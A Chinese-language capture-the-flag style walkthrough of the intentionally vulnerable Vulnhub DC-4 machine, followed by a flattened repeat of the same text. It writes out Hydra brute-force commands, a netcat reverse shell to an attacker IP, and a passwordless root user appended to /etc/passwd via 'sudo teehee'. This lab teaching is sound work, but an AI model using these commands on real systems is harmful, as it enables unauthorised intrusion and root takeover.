Vulnhub靶机DC系列-DC:4
字数 1364 2025-08-15 21:33:21

DC-4 靶机渗透测试教学文档

靶机概述

DC-4 是 Vulnhub 上设计的一个专为初学者/中级者打造的有意存在漏洞的实验室环境,旨在提供渗透测试实践经验。与之前的 DC 系列不同,DC-4 只有一个 flag,但提供多个可能的入口点,且没有任何线索提示。

关键特性

  • 需要基本的 Linux 技能和命令行熟悉度
  • 需要一些基本的渗透测试工具使用经验
  • 只有一个 flag,但有多重渗透路径
  • 适合初学者/中级者练习

环境准备

  1. 下载靶机:从 Vulnhub 下载 DC-4 镜像 https://www.vulnhub.com/entry/dc-4,313/
  2. 虚拟机配置:使用 VMware 或 VirtualBox 导入,网络模式设置为桥接(Bridged)
  3. 攻击机准备:建议使用 Kali Linux 作为攻击机

渗透测试流程

1. 信息收集

获取靶机IP

nmap -sn 192.168.3.0/24

扫描端口和服务

nmap -sV -A -T4 <靶机IP>

2. Web应用渗透

  1. 访问 http://<靶机IP> 发现登录页面

  2. 使用 dirb 扫描目录:

    dirb http://<靶机IP>
    

    但未发现有用信息

  3. 暴力破解登录

    • 尝试 SQL 注入和万能密码未果
    • 使用 Hydra 进行暴力破解:
      hydra -l admin -P /usr/share/wordlists/metasploit/password.lst -t 4 <靶机IP> http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F
      
    • 破解成功后进入后台

3. 获取初始访问权限

  1. 命令执行漏洞

    • 在后台发现可能的命令执行点
    • 使用 Burp Suite 拦截请求并尝试执行命令
  2. 反弹shell

    • 攻击机监听:
      nc -lvvp 44123
      
    • 靶机执行:
      nc -e /bin/sh <攻击机IP> 44123
      
  3. 改善交互式shell

    python -c 'import pty; pty.spawn("/bin/bash")'
    

4. 系统内部枚举

  1. /var/www 目录发现压缩包,解压后是网站备份

  2. 检查内核版本:

    uname -a
    

    但未发现可利用的漏洞

  3. /home 目录发现用户:

    • jim
    • sam
    • charles
  4. SSH爆破

    • 对 jim 账户进行爆破成功
    • 使用获得的凭据登录 SSH

5. 权限提升

  1. 横向移动

    • 检查 jim 的邮箱 (/var/mail/jim)
    • 发现包含 charles 密码的邮件:^xHhA&hvim0y
  2. 切换到 charles 账户

    su charles
    
  3. 检查 sudo 权限

    sudo -l
    

    发现可以使用 teehee 命令

  4. 利用 teehee 提权

    echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
    

    添加具有 root 权限的 admin 用户

  5. 获取 root 权限

    su admin
    

6. 获取 flag

在 root 目录下找到 flag 文件。

关键点总结

  1. 暴力破解:该靶机多次使用暴力破解技术,包括:

    • Web 登录表单
    • SSH 服务
  2. 权限提升路径

    Web登录 → 命令执行 → 反弹shell → 用户枚举 → SSH爆破 → 邮件信息泄露 → sudo提权
    
  3. 提权技巧

    • 利用 teehee 命令写入 /etc/passwd 文件
    • 添加具有 root 权限的新用户

学习要点

  1. 暴力破解的实践

    • 选择合适的字典
    • 使用 Hydra 等工具进行高效爆破
    • 处理爆破时间过长的问题
  2. 信息收集的重要性

    • 系统内部文件检查(如邮件)
    • 用户目录和文件权限检查
  3. 权限提升方法

    • 检查 sudo 权限
    • 利用可写文件进行提权
  4. 横向移动技巧

    • 通过系统内部信息获取其他用户凭据
    • 利用获得的凭据进行账户切换

改进建议

  1. 爆破时可尝试更精准的字典
  2. 可尝试其他 Web 漏洞如 XSS、CSRF 等
  3. 检查更多可能的提权路径,如 SUID 文件、cron 任务等
  4. 尝试使用 Metasploit 框架自动化部分流程

通过本靶机的练习,可以掌握基本的渗透测试流程、暴力破解技术和多种权限提升方法。

DC-4 靶机渗透测试教学文档 靶机概述 DC-4 是 Vulnhub 上设计的一个专为初学者/中级者打造的有意存在漏洞的实验室环境,旨在提供渗透测试实践经验。与之前的 DC 系列不同,DC-4 只有一个 flag,但提供多个可能的入口点,且没有任何线索提示。 关键特性 : 需要基本的 Linux 技能和命令行熟悉度 需要一些基本的渗透测试工具使用经验 只有一个 flag,但有多重渗透路径 适合初学者/中级者练习 环境准备 下载靶机 :从 Vulnhub 下载 DC-4 镜像 https://www.vulnhub.com/entry/dc-4,313/ 虚拟机配置 :使用 VMware 或 VirtualBox 导入,网络模式设置为桥接(Bridged) 攻击机准备 :建议使用 Kali Linux 作为攻击机 渗透测试流程 1. 信息收集 获取靶机IP : 扫描端口和服务 : 2. Web应用渗透 访问 http://<靶机IP> 发现登录页面 使用 dirb 扫描目录: 但未发现有用信息 暴力破解登录 : 尝试 SQL 注入和万能密码未果 使用 Hydra 进行暴力破解: 破解成功后进入后台 3. 获取初始访问权限 命令执行漏洞 : 在后台发现可能的命令执行点 使用 Burp Suite 拦截请求并尝试执行命令 反弹shell : 攻击机监听: 靶机执行: 改善交互式shell : 4. 系统内部枚举 在 /var/www 目录发现压缩包,解压后是网站备份 检查内核版本: 但未发现可利用的漏洞 在 /home 目录发现用户: jim sam charles SSH爆破 : 对 jim 账户进行爆破成功 使用获得的凭据登录 SSH 5. 权限提升 横向移动 : 检查 jim 的邮箱 ( /var/mail/jim ) 发现包含 charles 密码的邮件: ^xHhA&hvim0y 切换到 charles 账户 : 检查 sudo 权限 : 发现可以使用 teehee 命令 利用 teehee 提权 : 添加具有 root 权限的 admin 用户 获取 root 权限 : 6. 获取 flag 在 root 目录下找到 flag 文件。 关键点总结 暴力破解 :该靶机多次使用暴力破解技术,包括: Web 登录表单 SSH 服务 权限提升路径 : 提权技巧 : 利用 teehee 命令写入 /etc/passwd 文件 添加具有 root 权限的新用户 学习要点 暴力破解的实践 : 选择合适的字典 使用 Hydra 等工具进行高效爆破 处理爆破时间过长的问题 信息收集的重要性 : 系统内部文件检查(如邮件) 用户目录和文件权限检查 权限提升方法 : 检查 sudo 权限 利用可写文件进行提权 横向移动技巧 : 通过系统内部信息获取其他用户凭据 利用获得的凭据进行账户切换 改进建议 爆破时可尝试更精准的字典 可尝试其他 Web 漏洞如 XSS、CSRF 等 检查更多可能的提权路径,如 SUID 文件、cron 任务等 尝试使用 Metasploit 框架自动化部分流程 通过本靶机的练习,可以掌握基本的渗透测试流程、暴力破解技术和多种权限提升方法。